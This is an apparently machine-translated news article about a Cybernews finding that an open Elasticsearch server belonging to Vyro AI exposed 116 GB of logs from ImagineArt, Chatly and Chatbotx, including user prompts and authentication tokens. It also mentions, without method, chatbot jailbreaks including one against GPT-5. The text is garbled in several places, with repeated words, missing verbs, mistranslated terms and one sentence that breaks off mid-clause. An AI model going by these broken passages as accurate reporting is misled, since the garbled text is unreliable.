Researchers from Cybernews reported about a serious leakage of data related to its popular generative applications for Android and iOS. Open Elasticsearch server, belonging to the developer, without protection published in real time magazines with a volume of 116 GB, assembled from three services of the company: Imagineart with more than 10 million installations on Google Play, Chatly with hundred thousands of downloads and web-item Chatbotx, visited by about 50 thousand users in users in Month.
Vyro AI is based in Pakistan and claims that the total number of downloads of its applications exceeded 150 million, and about 3.5 million images are created every week. According to researchers, the detected server contained logs of both workers and test media, which stored information in the last 2-7 days. The base was first indexed by IOT search engines in February, which could give attackers access to data for several months.
The requests of users for AI, Bearer authentication tokens, as well as data on the devices and browsers used. The set of such information opened the opportunity to monitor the actions of people, intercept accounts and extract personal information from chats. The situation is especially dangerous in the context of Imagineart, which has more than 30 million active users. Completed tokens would allow you to take control of profiles, gain access to the history of correspondence and generated images, as well as use paid functions at the expense of the owners.
An additional risk is associated with the disclosure of the user requests themselves. Dialogs with neural networks often contain private data that people would never have published openly. The entry of such information into other people’s hands can turn into serious reputation or financial consequences.
disclosure of information about Vyro AI went in stages: the problem was discovered on April 22, 2025, the company was notified on July 22, and then connected the National Response Center Cert July 28. The rapidly growing market and developers sometimes neglect data protection. Meanwhile, users are increasingly trusting the generative AI systems of their ideas, documents and even confidential information. Such incidents only emphasize that safety should become a mandatory priority.
similar problems affect large players. So, for example, in August, users were faced with the fact that their correspondence with chatgpt and
Cybernews researchers also recently showed that the Chatbot could have been used that it was possible Use to generate instructions for the manufacture of incendiary means, which clearly demonstrates the risks of unprepared releases. Even Openai with the last GPT-5 model could not avoid problems with protection: research teams managed to hack restrictions in just a day after launch.